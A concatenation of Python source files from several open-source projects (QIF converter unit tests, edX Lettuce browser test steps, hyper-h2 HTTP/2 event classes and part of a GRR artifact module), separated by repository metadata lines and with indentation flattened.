# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.insert(0, '../3rdparty')
sys.path.insert(0, '../lib')
import ofxtools
import textwrap
import unittest
from pyparsing import ParseException
from time import localtime, strftime
class QifConverterTests(unittest.TestCase):
def test_bank_stmttype(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.accttype, "CHECKING")
def test_ccard_stmttype(self):
qiftext = textwrap.dedent('''\
!Type:CCard
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.accttype, "CREDITCARD")
def test_no_stmttype(self):
qiftext = textwrap.dedent('''\
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.accttype, "CHECKING")
def test_no_txns(self):
qiftext = textwrap.dedent('''\
!Type:Bank
''')
today = strftime("%Y%m%d", localtime())
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.start_date, today)
self.assertEqual(converter.end_date, today)
def test_us_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20050113"))
def test_uk_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D13/01/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20050113"))
def test_ambiguous_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D12/01/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20051201"))
def test_mixed_us_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/12/2005
^
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20050112"))
self.assertTrue(converter.txns_by_date.has_key("20050113"))
def test_mixed_uk_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D12/01/2005
^
D13/01/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20050112"))
self.assertTrue(converter.txns_by_date.has_key("20050113"))
def test_slashfree_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D12012005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20051201"))
def test_unparseable_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
DFnargle
^
''')
self.assertRaises(ValueError, ofxtools.QifConverter, qiftext)
def test_len_eight_no_int_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
DAAAAAAAA
^
''')
self.assertRaises(ValueError, ofxtools.QifConverter, qiftext)
def test_asc_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/13/2005
^
D01/27/2005
^
D02/01/2005
^
D02/01/2005
^
D02/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.start_date, "20050113")
self.assertEqual(converter.end_date, "20050213")
self.assertEqual(len(converter.txns_by_date.keys()), 4)
def test_desc_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D02/13/2005
^
D02/01/2005
^
D02/01/2005
^
D01/27/2005
^
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.start_date, "20050113")
self.assertEqual(converter.end_date, "20050213")
self.assertEqual(len(converter.txns_by_date.keys()), 4)
def test_mixed_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D02/01/2005
^
D02/13/2005
^
D01/13/2005
^
D02/01/2005
^
D01/27/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.start_date, "20050113")
self.assertEqual(converter.end_date, "20050213")
self.assertEqual(len(converter.txns_by_date.keys()), 4)
def test_default_currency(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
^
''')
converter = ofxtools.QifConverter(qiftext)
ofx102 = converter.to_ofx102()
self.assertTrue(ofx102.find('<CURDEF>USD') != -1)
def test_found_currency(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
^EUR
''')
converter = ofxtools.QifConverter(qiftext)
ofx102 = converter.to_ofx102()
self.assertTrue(ofx102.find('<CURDEF>EUR') != -1)
def test_explicit_currency(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
^
''')
converter = ofxtools.QifConverter(qiftext, curdef='GBP')
ofx102 = converter.to_ofx102()
self.assertTrue(ofx102.find('<CURDEF>GBP') != -1)
def test_amount2(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D02/01/2005
U25.42
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20050201"][0]
self.assertEqual(txn["Amount"], "25.42")
def test_bad_amount_precision(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.930
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn["Amount"], "417.93")
def test_dash_amount(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D02/01/2005
T25.42
^
D02/01/2005
T-
^
''')
converter = ofxtools.QifConverter(qiftext)
txn_list = converter.txns_by_date["20050201"]
self.assertEqual(len(txn_list), 1)
txn = txn_list[0]
self.assertEqual(txn["Amount"], "25.42")
def test_trailing_minus(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D08/06/2008
T26.24-
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20080806"][0]
self.assertEqual(txn["Amount"], "-26.24")
def test_n_a_number(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
NN/A
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn.has_key("Number"), False)
def test_creditcard_number(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
NXXXX-XXXX-XXXX-1234
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn.has_key("Number"), False)
def test_creditcard_stmt_number(self):
qiftext = textwrap.dedent('''\
!Type:CCard
D01/25/2007
T417.93
N1234
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn.has_key("Number"), False)
def test_check_stmt_number(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
N1234
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn.get("Type"), "CHECK")
if __name__ == '__main__':
unittest.main()
|
apache-2.0
|
XiaodunServerGroup/ddyedx
|
common/djangoapps/terrain/steps.py
|
7
|
6704
|
#pylint: disable=C0111
#pylint: disable=W0621
# Disable the "wildcard import" warning so we can bring in all methods from
# course helpers and ui helpers
#pylint: disable=W0401
# Disable the "Unused import %s from wildcard import" warning
#pylint: disable=W0614
# Disable the "unused argument" warning because lettuce uses "step"
#pylint: disable=W0613
# django_url is assigned late in the process of loading lettuce,
# so we import this as a module, and then read django_url from
# it to get the correct value
import lettuce.django
from lettuce import world, step
from .course_helpers import *
from .ui_helpers import *
from nose.tools import assert_equals # pylint: disable=E0611
from logging import getLogger
logger = getLogger(__name__)
@step(r'I wait (?:for )?"(\d+\.?\d*)" seconds?$')
def wait_for_seconds(step, seconds):
world.wait(seconds)
@step('I reload the page$')
def reload_the_page(step):
world.wait_for_ajax_complete()
world.browser.reload()
world.wait_for_js_to_load()
@step('I press the browser back button$')
def browser_back(step):
world.browser.driver.back()
@step('I (?:visit|access|open) the homepage$')
def i_visit_the_homepage(step):
world.visit('/')
assert world.is_css_present('header.global')
@step(u'I (?:visit|access|open) the dashboard$')
def i_visit_the_dashboard(step):
world.visit('/dashboard')
assert world.is_css_present('section.container.dashboard')
@step('I should be on the dashboard page$')
def i_should_be_on_the_dashboard(step):
assert world.is_css_present('section.container.dashboard')
assert 'Dashboard' in world.browser.title
@step(u'I (?:visit|access|open) the courses page$')
def i_am_on_the_courses_page(step):
world.visit('/courses')
assert world.is_css_present('section.courses')
@step(u'I press the "([^"]*)" button$')
def and_i_press_the_button(step, value):
button_css = 'input[value="%s"]' % value
world.css_click(button_css)
@step(u'I click the link with the text "([^"]*)"$')
def click_the_link_with_the_text_group1(step, linktext):
world.click_link(linktext)
@step('I should see that the path is "([^"]*)"$')
def i_should_see_that_the_path_is(step, path):
assert world.url_equals(path)
@step(u'the page title should be "([^"]*)"$')
def the_page_title_should_be(step, title):
assert_equals(world.browser.title, title)
@step(u'the page title should contain "([^"]*)"$')
def the_page_title_should_contain(step, title):
assert(title in world.browser.title)
@step('I log in$')
def i_log_in(step):
world.log_in(username='robot', password='test')
@step('I am a logged in user$')
def i_am_logged_in_user(step):
world.create_user('robot', 'test')
world.log_in(username='robot', password='test')
@step('I am not logged in$')
def i_am_not_logged_in(step):
world.visit('logout')
@step('I am staff for course "([^"]*)"$')
def i_am_staff_for_course_by_id(step, course_id):
world.register_by_course_id(course_id, True)
@step(r'click (?:the|a) link (?:called|with the text) "([^"]*)"$')
def click_the_link_called(step, text):
world.click_link(text)
@step(r'should see that the url is "([^"]*)"$')
def should_have_the_url(step, url):
assert_equals(world.browser.url, url)
@step(r'should see (?:the|a) link (?:called|with the text) "([^"]*)"$')
def should_see_a_link_called(step, text):
assert len(world.browser.find_link_by_text(text)) > 0
@step(r'should see (?:the|a) link with the id "([^"]*)" called "([^"]*)"$')
def should_have_link_with_id_and_text(step, link_id, text):
link = world.browser.find_by_id(link_id)
assert len(link) > 0
assert_equals(link.text, text)
@step(r'should see a link to "([^"]*)" with the text "([^"]*)"$')
def should_have_link_with_path_and_text(step, path, text):
link = world.browser.find_link_by_text(text)
assert len(link) > 0
assert_equals(link.first["href"], lettuce.django.django_url(path))
@step(r'should( not)? see "(.*)" (?:somewhere|anywhere) (?:in|on) (?:the|this) page')
def should_see_in_the_page(step, doesnt_appear, text):
if world.LETTUCE_SELENIUM_CLIENT == 'saucelabs':
multiplier = 2
else:
multiplier = 1
if doesnt_appear:
assert world.browser.is_text_not_present(text, wait_time=5 * multiplier)
else:
assert world.browser.is_text_present(text, wait_time=5 * multiplier)
@step('I am logged in$')
def i_am_logged_in(step):
world.create_user('robot', 'test')
world.log_in(username='robot', password='test')
world.browser.visit(lettuce.django.django_url('/'))
dash_css = 'section.container.dashboard'
assert world.is_css_present(dash_css)
@step(u'I am an edX user$')
def i_am_an_edx_user(step):
world.create_user('robot', 'test')
@step(u'User "([^"]*)" is an edX user$')
def registered_edx_user(step, uname):
world.create_user(uname, 'test')
@step(u'All dialogs should be closed$')
def dialogs_are_closed(step):
assert world.dialogs_closed()
@step(u'visit the url "([^"]*)"')
def visit_url(step, url):
world.browser.visit(lettuce.django.django_url(url))
@step(u'wait for AJAX to (?:finish|complete)')
def wait_ajax(_step):
wait_for_ajax_complete()
@step('I will confirm all alerts')
def i_confirm_all_alerts(step):
"""
Please note: This method must be called RIGHT BEFORE an expected alert
Window variables are page local and thus all changes are removed upon navigating to a new page
In addition, this method changes the functionality of ONLY future alerts
"""
world.browser.execute_script('window.confirm = function(){return true;} ; window.alert = function(){return;}')
@step('I will cancel all alerts')
def i_cancel_all_alerts(step):
"""
Please note: This method must be called RIGHT BEFORE an expected alert
Window variables are page local and thus all changes are removed upon navigating to a new page
In addition, this method changes the functionality of ONLY future alerts
"""
world.browser.execute_script('window.confirm = function(){return false;} ; window.alert = function(){return;}')
@step('I will answer all prompts with "([^"]*)"')
def i_answer_prompts_with(step, prompt):
"""
Please note: This method must be called RIGHT BEFORE an expected alert
Window variables are page local and thus all changes are removed upon navigating to a new page
In addition, this method changes the functionality of ONLY future alerts
"""
world.browser.execute_script('window.prompt = function(){return %s;}') % prompt
@step('I run ipdb')
def run_ipdb(_step):
"""Run ipdb as step for easy debugging"""
import ipdb
ipdb.set_trace()
assert True
|
agpl-3.0
|
szeged/servo
|
tests/wpt/web-platform-tests/tools/third_party/h2/h2/events.py
|
27
|
21277
|
# -*- coding: utf-8 -*-
"""
h2/events
~~~~~~~~~
Defines Event types for HTTP/2.
Events are returned by the H2 state machine to allow implementations to keep
track of events triggered by receiving data. Each time data is provided to the
H2 state machine it processes the data and returns a list of Event objects.
"""
import binascii
from .settings import ChangedSetting, _setting_code_from_int
class Event(object):
"""
Base class for h2 events.
"""
pass
class RequestReceived(Event):
"""
The RequestReceived event is fired whenever request headers are received.
This event carries the HTTP headers for the given request and the stream ID
of the new stream.
.. versionchanged:: 2.3.0
Changed the type of ``headers`` to :class:`HeaderTuple
<hpack:hpack.HeaderTuple>`. This has no effect on current users.
.. versionchanged:: 2.4.0
Added ``stream_ended`` and ``priority_updated`` properties.
"""
def __init__(self):
#: The Stream ID for the stream this request was made on.
self.stream_id = None
#: The request headers.
self.headers = None
#: If this request also ended the stream, the associated
#: :class:`StreamEnded <h2.events.StreamEnded>` event will be available
#: here.
#:
#: .. versionadded:: 2.4.0
self.stream_ended = None
#: If this request also had associated priority information, the
#: associated :class:`PriorityUpdated <h2.events.PriorityUpdated>`
#: event will be available here.
#:
#: .. versionadded:: 2.4.0
self.priority_updated = None
def __repr__(self):
return "<RequestReceived stream_id:%s, headers:%s>" % (
self.stream_id, self.headers
)
class ResponseReceived(Event):
"""
The ResponseReceived event is fired whenever response headers are received.
This event carries the HTTP headers for the given response and the stream
ID of the new stream.
.. versionchanged:: 2.3.0
Changed the type of ``headers`` to :class:`HeaderTuple
<hpack:hpack.HeaderTuple>`. This has no effect on current users.
.. versionchanged:: 2.4.0
Added ``stream_ended`` and ``priority_updated`` properties.
"""
def __init__(self):
#: The Stream ID for the stream this response was made on.
self.stream_id = None
#: The response headers.
self.headers = None
#: If this response also ended the stream, the associated
#: :class:`StreamEnded <h2.events.StreamEnded>` event will be available
#: here.
#:
#: .. versionadded:: 2.4.0
self.stream_ended = None
#: If this response also had associated priority information, the
#: associated :class:`PriorityUpdated <h2.events.PriorityUpdated>`
#: event will be available here.
#:
#: .. versionadded:: 2.4.0
self.priority_updated = None
def __repr__(self):
return "<ResponseReceived stream_id:%s, headers:%s>" % (
self.stream_id, self.headers
)
class TrailersReceived(Event):
"""
The TrailersReceived event is fired whenever trailers are received on a
stream. Trailers are a set of headers sent after the body of the
request/response, and are used to provide information that wasn't known
ahead of time (e.g. content-length). This event carries the HTTP header
fields that form the trailers and the stream ID of the stream on which they
were received.
.. versionchanged:: 2.3.0
Changed the type of ``headers`` to :class:`HeaderTuple
<hpack:hpack.HeaderTuple>`. This has no effect on current users.
.. versionchanged:: 2.4.0
Added ``stream_ended`` and ``priority_updated`` properties.
"""
def __init__(self):
#: The Stream ID for the stream on which these trailers were received.
self.stream_id = None
#: The trailers themselves.
self.headers = None
#: Trailers always end streams. This property has the associated
#: :class:`StreamEnded <h2.events.StreamEnded>` in it.
#:
#: .. versionadded:: 2.4.0
self.stream_ended = None
#: If the trailers also set associated priority information, the
#: associated :class:`PriorityUpdated <h2.events.PriorityUpdated>`
#: event will be available here.
#:
#: .. versionadded:: 2.4.0
self.priority_updated = None
def __repr__(self):
return "<TrailersReceived stream_id:%s, headers:%s>" % (
self.stream_id, self.headers
)
class _HeadersSent(Event):
"""
The _HeadersSent event is fired whenever headers are sent.
This is an internal event, used to determine validation steps on
outgoing header blocks.
"""
pass
class _ResponseSent(_HeadersSent):
"""
The _ResponseSent event is fired whenever response headers are sent
on a stream.
This is an internal event, used to determine validation steps on
outgoing header blocks.
"""
pass
class _RequestSent(_HeadersSent):
"""
The _RequestSent event is fired whenever request headers are sent
on a stream.
This is an internal event, used to determine validation steps on
outgoing header blocks.
"""
pass
class _TrailersSent(_HeadersSent):
"""
The _TrailersSent event is fired whenever trailers are sent on a
stream. Trailers are a set of headers sent after the body of the
request/response, and are used to provide information that wasn't known
ahead of time (e.g. content-length).
This is an internal event, used to determine validation steps on
outgoing header blocks.
"""
pass
class _PushedRequestSent(_HeadersSent):
"""
The _PushedRequestSent event is fired whenever pushed request headers are
sent.
This is an internal event, used to determine validation steps on outgoing
header blocks.
"""
pass
class InformationalResponseReceived(Event):
"""
The InformationalResponseReceived event is fired when an informational
response (that is, one whose status code is a 1XX code) is received from
the remote peer.
The remote peer may send any number of these, from zero upwards. These
responses are most commonly sent in response to requests that have the
``expect: 100-continue`` header field present. Most users can safely
ignore this event unless you are intending to use the
``expect: 100-continue`` flow, or are for any reason expecting a different
1XX status code.
.. versionadded:: 2.2.0
.. versionchanged:: 2.3.0
Changed the type of ``headers`` to :class:`HeaderTuple
<hpack:hpack.HeaderTuple>`. This has no effect on current users.
.. versionchanged:: 2.4.0
Added ``priority_updated`` property.
"""
def __init__(self):
#: The Stream ID for the stream this informational response was made
#: on.
self.stream_id = None
#: The headers for this informational response.
self.headers = None
#: If this response also had associated priority information, the
#: associated :class:`PriorityUpdated <h2.events.PriorityUpdated>`
#: event will be available here.
#:
#: .. versionadded:: 2.4.0
self.priority_updated = None
def __repr__(self):
return "<InformationalResponseReceived stream_id:%s, headers:%s>" % (
self.stream_id, self.headers
)
class DataReceived(Event):
"""
The DataReceived event is fired whenever data is received on a stream from
the remote peer. The event carries the data itself, and the stream ID on
which the data was received.
.. versionchanged:: 2.4.0
Added ``stream_ended`` property.
"""
def __init__(self):
#: The Stream ID for the stream this data was received on.
self.stream_id = None
#: The data itself.
self.data = None
#: The amount of data received that counts against the flow control
#: window. Note that padding counts against the flow control window, so
#: when adjusting flow control you should always use this field rather
#: than ``len(data)``.
self.flow_controlled_length = None
#: If this data chunk also completed the stream, the associated
#: :class:`StreamEnded <h2.events.StreamEnded>` event will be available
#: here.
#:
#: .. versionadded:: 2.4.0
self.stream_ended = None
def __repr__(self):
return (
"<DataReceived stream_id:%s, "
"flow_controlled_length:%s, "
"data:%s>" % (
self.stream_id,
self.flow_controlled_length,
_bytes_representation(self.data[:20]),
)
)
class WindowUpdated(Event):
"""
The WindowUpdated event is fired whenever a flow control window changes
size. HTTP/2 defines flow control windows for connections and streams: this
event fires for both connections and streams. The event carries the ID of
the stream to which it applies (set to zero if the window update applies to
the connection), and the delta in the window size.
"""
def __init__(self):
#: The Stream ID of the stream whose flow control window was changed.
#: May be ``0`` if the connection window was changed.
self.stream_id = None
#: The window delta.
self.delta = None
def __repr__(self):
return "<WindowUpdated stream_id:%s, delta:%s>" % (
self.stream_id, self.delta
)
class RemoteSettingsChanged(Event):
"""
The RemoteSettingsChanged event is fired whenever the remote peer changes
its settings. It contains a complete inventory of changed settings,
including their previous values.
In HTTP/2, settings changes need to be acknowledged. hyper-h2 automatically
acknowledges settings changes for efficiency. However, it is possible that
the caller may not be happy with the changed setting.
When this event is received, the caller should confirm that the new
settings are acceptable. If they are not acceptable, the user should close
the connection with the error code :data:`PROTOCOL_ERROR
<h2.errors.ErrorCodes.PROTOCOL_ERROR>`.
.. versionchanged:: 2.0.0
Prior to this version the user needed to acknowledge settings changes.
This is no longer the case: hyper-h2 now automatically acknowledges
them.
"""
def __init__(self):
#: A dictionary of setting byte to
#: :class:`ChangedSetting <h2.settings.ChangedSetting>`, representing
#: the changed settings.
self.changed_settings = {}
@classmethod
def from_settings(cls, old_settings, new_settings):
"""
Build a RemoteSettingsChanged event from a set of changed settings.
:param old_settings: A complete collection of old settings, in the form
of a dictionary of ``{setting: value}``.
:param new_settings: All the changed settings and their new values, in
the form of a dictionary of ``{setting: value}``.
"""
e = cls()
for setting, new_value in new_settings.items():
setting = _setting_code_from_int(setting)
original_value = old_settings.get(setting)
change = ChangedSetting(setting, original_value, new_value)
e.changed_settings[setting] = change
return e
def __repr__(self):
return "<RemoteSettingsChanged changed_settings:{%s}>" % (
", ".join(repr(cs) for cs in self.changed_settings.values()),
)
class PingAcknowledged(Event):
"""
The PingAcknowledged event is fired whenever a user-emitted PING is
acknowledged. This contains the data in the ACK'ed PING, allowing the
user to correlate PINGs and calculate RTT.
"""
def __init__(self):
#: The data included on the ping.
self.ping_data = None
def __repr__(self):
return "<PingAcknowledged ping_data:%s>" % (
_bytes_representation(self.ping_data),
)
class StreamEnded(Event):
"""
The StreamEnded event is fired whenever a stream is ended by a remote
party. The stream may not be fully closed if it has not been closed
locally, but no further data or headers should be expected on that stream.
"""
def __init__(self):
#: The Stream ID of the stream that was closed.
self.stream_id = None
def __repr__(self):
return "<StreamEnded stream_id:%s>" % self.stream_id
class StreamReset(Event):
"""
The StreamReset event is fired in two situations. The first is when the
remote party forcefully resets the stream. The second is when the remote
party has made a protocol error which only affects a single stream. In this
case, Hyper-h2 will terminate the stream early and return this event.
.. versionchanged:: 2.0.0
This event is now fired when Hyper-h2 automatically resets a stream.
"""
def __init__(self):
#: The Stream ID of the stream that was reset.
self.stream_id = None
#: The error code given. Either one of :class:`ErrorCodes
#: <h2.errors.ErrorCodes>` or ``int``
self.error_code = None
#: Whether the remote peer sent a RST_STREAM or we did.
self.remote_reset = True
def __repr__(self):
return "<StreamReset stream_id:%s, error_code:%s, remote_reset:%s>" % (
self.stream_id, self.error_code, self.remote_reset
)
class PushedStreamReceived(Event):
"""
The PushedStreamReceived event is fired whenever a pushed stream has been
received from a remote peer. The event carries on it the new stream ID, the
ID of the parent stream, and the request headers pushed by the remote peer.
"""
def __init__(self):
#: The Stream ID of the stream created by the push.
self.pushed_stream_id = None
#: The Stream ID of the stream that the push is related to.
self.parent_stream_id = None
#: The request headers, sent by the remote party in the push.
self.headers = None
def __repr__(self):
return (
"<PushedStreamReceived pushed_stream_id:%s, parent_stream_id:%s, "
"headers:%s>" % (
self.pushed_stream_id,
self.parent_stream_id,
self.headers,
)
)
class SettingsAcknowledged(Event):
"""
The SettingsAcknowledged event is fired whenever a settings ACK is received
from the remote peer. The event carries on it the settings that were
acknowedged, in the same format as
:class:`h2.events.RemoteSettingsChanged`.
"""
def __init__(self):
#: A dictionary of setting byte to
#: :class:`ChangedSetting <h2.settings.ChangedSetting>`, representing
#: the changed settings.
self.changed_settings = {}
def __repr__(self):
return "<SettingsAcknowledged changed_settings:{%s}>" % (
", ".join(repr(cs) for cs in self.changed_settings.values()),
)
class PriorityUpdated(Event):
"""
The PriorityUpdated event is fired whenever a stream sends updated priority
information. This can occur when the stream is opened, or at any time
during the stream lifetime.
This event is purely advisory, and does not need to be acted on.
.. versionadded:: 2.0.0
"""
def __init__(self):
#: The ID of the stream whose priority information is being updated.
self.stream_id = None
#: The new stream weight. May be the same as the original stream
#: weight. An integer between 1 and 256.
self.weight = None
#: The stream ID this stream now depends on. May be ``0``.
self.depends_on = None
#: Whether the stream *exclusively* depends on the parent stream. If it
#: does, this stream should inherit the current children of its new
#: parent.
self.exclusive = None
def __repr__(self):
return (
"<PriorityUpdated stream_id:%s, weight:%s, depends_on:%s, "
"exclusive:%s>" % (
self.stream_id,
self.weight,
self.depends_on,
self.exclusive
)
)
class ConnectionTerminated(Event):
"""
The ConnectionTerminated event is fired when a connection is torn down by
the remote peer using a GOAWAY frame. Once received, no further action may
be taken on the connection: a new connection must be established.
"""
def __init__(self):
#: The error code cited when tearing down the connection. Should be
#: one of :class:`ErrorCodes <h2.errors.ErrorCodes>`, but may not be if
#: unknown HTTP/2 extensions are being used.
self.error_code = None
#: The stream ID of the last stream the remote peer saw. This can
#: provide an indication of what data, if any, never reached the remote
#: peer and so can safely be resent.
self.last_stream_id = None
#: Additional debug data that can be appended to GOAWAY frame.
self.additional_data = None
def __repr__(self):
return (
"<ConnectionTerminated error_code:%s, last_stream_id:%s, "
"additional_data:%s>" % (
self.error_code,
self.last_stream_id,
_bytes_representation(
self.additional_data[:20]
if self.additional_data else None)
)
)
class AlternativeServiceAvailable(Event):
"""
The AlternativeServiceAvailable event is fired when the remote peer
advertises an `RFC 7838 <https://tools.ietf.org/html/rfc7838>`_ Alternative
Service using an ALTSVC frame.
This event always carries the origin to which the ALTSVC information
applies. That origin is either supplied by the server directly, or inferred
by hyper-h2 from the ``:authority`` pseudo-header field that was sent by
the user when initiating a given stream.
This event also carries what RFC 7838 calls the "Alternative Service Field
Value", which is formatted like a HTTP header field and contains the
relevant alternative service information. Hyper-h2 does not parse or in any
way modify that information: the user is required to do that.
This event can only be fired on the client end of a connection.
.. versionadded:: 2.3.0
"""
def __init__(self):
#: The origin to which the alternative service field value applies.
#: This field is either supplied by the server directly, or inferred by
#: hyper-h2 from the ``:authority`` pseudo-header field that was sent
#: by the user when initiating the stream on which the frame was
#: received.
self.origin = None
#: The ALTSVC field value. This contains information about the HTTP
#: alternative service being advertised by the server. Hyper-h2 does
#: not parse this field: it is left exactly as sent by the server. The
#: structure of the data in this field is given by `RFC 7838 Section 3
#: <https://tools.ietf.org/html/rfc7838#section-3>`_.
self.field_value = None
def __repr__(self):
return (
"<AlternativeServiceAvailable origin:%s, field_value:%s>" % (
self.origin.decode('utf-8', 'ignore'),
self.field_value.decode('utf-8', 'ignore'),
)
)
class UnknownFrameReceived(Event):
"""
The UnknownFrameReceived event is fired when the remote peer sends a frame
that hyper-h2 does not understand. This occurs primarily when the remote
peer is employing HTTP/2 extensions that hyper-h2 doesn't know anything
about.
RFC 7540 requires that HTTP/2 implementations ignore these frames. hyper-h2
does so. However, this event is fired to allow implementations to perform
special processing on those frames if needed (e.g. if the implementation
is capable of handling the frame itself).
.. versionadded:: 2.7.0
"""
def __init__(self):
#: The hyperframe Frame object that encapsulates the received frame.
self.frame = None
def __repr__(self):
return "<UnknownFrameReceived>"
def _bytes_representation(data):
"""
Converts a bytestring into something that is safe to print on all Python
platforms.
This function is relatively expensive, so it should not be called on the
mainline of the code. It's safe to use in things like object repr methods
though.
"""
if data is None:
return None
hex = binascii.hexlify(data)
# This is moderately clever: on all Python versions hexlify returns a byte
# string. On Python 3 we want an actual string, so we just check whether
# that's what we have.
if not isinstance(hex, str): # pragma: no cover
hex = hex.decode('ascii')
return hex
|
mpl-2.0
|
simsong/grr-insider
|
lib/artifact.py
|
1
|
15969
|
#!/usr/bin/env python
"""Base classes for artifacts."""
import logging
from grr.lib import aff4
from grr.lib import artifact_lib
from grr.lib import config_lib
from grr.lib import flow
from grr.lib import rdfvalue
from grr.lib import registry
from grr.lib import utils
class AFF4ResultWriter(object):
"""A wrapper class to allow writing objects to the AFF4 space."""
def __init__(self, path, aff4_type, aff4_attribute, mode):
self.path = path
self.aff4_type = aff4_type
self.aff4_attribute = aff4_attribute
self.mode = mode
def GetArtifactKnowledgeBase(client_obj, allow_uninitialized=False):
"""This generates an artifact knowledge base from a GRR client.
Args:
client_obj: A GRRClient object which is opened for reading.
allow_uninitialized: If True we accept an uninitialized knowledge_base.
Returns:
A KnowledgeBase semantic value.
Raises:
ArtifactProcessingError: If called when the knowledge base has not been
initialized.
KnowledgeBaseUninitializedError: If we failed to initialize the knowledge
base.
This is needed so that the artifact library has a standardized
interface to the data that is actually stored in the GRRClient object in
the GRR datastore.
We expect that the client KNOWLEDGE_BASE is already filled out through the,
KnowledgeBaseInitialization flow, but attempt to make some intelligent
guesses if things failed.
"""
client_schema = client_obj.Schema
kb = client_obj.Get(client_schema.KNOWLEDGE_BASE)
if not allow_uninitialized and (not kb or not kb.os):
raise artifact_lib.KnowledgeBaseUninitializedError(
"Attempting to retreive uninitialized KnowledgeBase for %s. Failing." %
client_obj.urn)
if not kb:
kb = client_schema.KNOWLEDGE_BASE()
SetCoreGRRKnowledgeBaseValues(kb, client_obj)
if kb.os == "Windows":
# Add fallback values.
if not kb.environ_allusersappdata and kb.environ_allusersprofile:
# Guess if we don't have it already.
if kb.os_major_version >= 6:
kb.environ_allusersappdata = u"c:\\programdata"
kb.environ_allusersprofile = u"c:\\programdata"
else:
kb.environ_allusersappdata = (u"c:\\documents and settings\\All Users\\"
"Application Data")
kb.environ_allusersprofile = u"c:\\documents and settings\\All Users"
return kb
def SetCoreGRRKnowledgeBaseValues(kb, client_obj):
"""Set core values from GRR into the knowledgebase."""
client_schema = client_obj.Schema
kb.hostname = utils.SmartUnicode(client_obj.Get(client_schema.FQDN, ""))
if not kb.hostname:
kb.hostname = utils.SmartUnicode(client_obj.Get(client_schema.HOSTNAME, ""))
versions = client_obj.Get(client_schema.OS_VERSION)
if versions and versions.versions:
kb.os_major_version = versions.versions[0]
kb.os_minor_version = versions.versions[1]
client_os = client_obj.Get(client_schema.SYSTEM)
if client_os:
kb.os = utils.SmartUnicode(client_obj.Get(client_schema.SYSTEM))
class KnowledgeBaseInitializationFlow(flow.GRRFlow):
"""Flow that atttempts to initialize the knowledge base.
This flow processes all artifacts specified by the Artifacts.knowledge_base
config. We search for dependent artifacts following the dependency tree
specified by the "provides" attributes in the artifact definitions.
We don't try to fulfill dependencies in the tree order, the reasoning is that
some artifacts may fail, and some artifacts provide the same dependency.
Instead we take an iterative approach and keep requesting artifacts until
all dependencies have been met. If there is more than one artifact that
provides a dependency we will collect them all as they likely have
different performance characteristics, e.g. accuracy and client impact.
"""
category = "/Collectors/"
behaviours = flow.GRRFlow.behaviours + "ADVANCED"
@flow.StateHandler(next_state="ProcessBootstrap")
def Start(self):
"""For each artifact, create subflows for each collector."""
self.client = aff4.FACTORY.Open(self.client_id, token=self.token)
kb = rdfvalue.KnowledgeBase()
SetCoreGRRKnowledgeBaseValues(kb, self.client)
if not kb.os:
raise flow.FlowError("Client OS not set for: %s, cannot initialize"
" KnowledgeBase" % self.client_id)
self.state.Register("knowledge_base", kb)
self.state.Register("fulfilled_deps", [])
self.state.Register("partial_fulfilled_deps", set())
self.state.Register("all_deps", set())
self.state.Register("in_flight_artifacts", [])
self.state.Register("awaiting_deps_artifacts", [])
self.state.Register("completed_artifacts", [])
self.CallFlow("BootStrapKnowledgeBaseFlow", next_state="ProcessBootstrap")
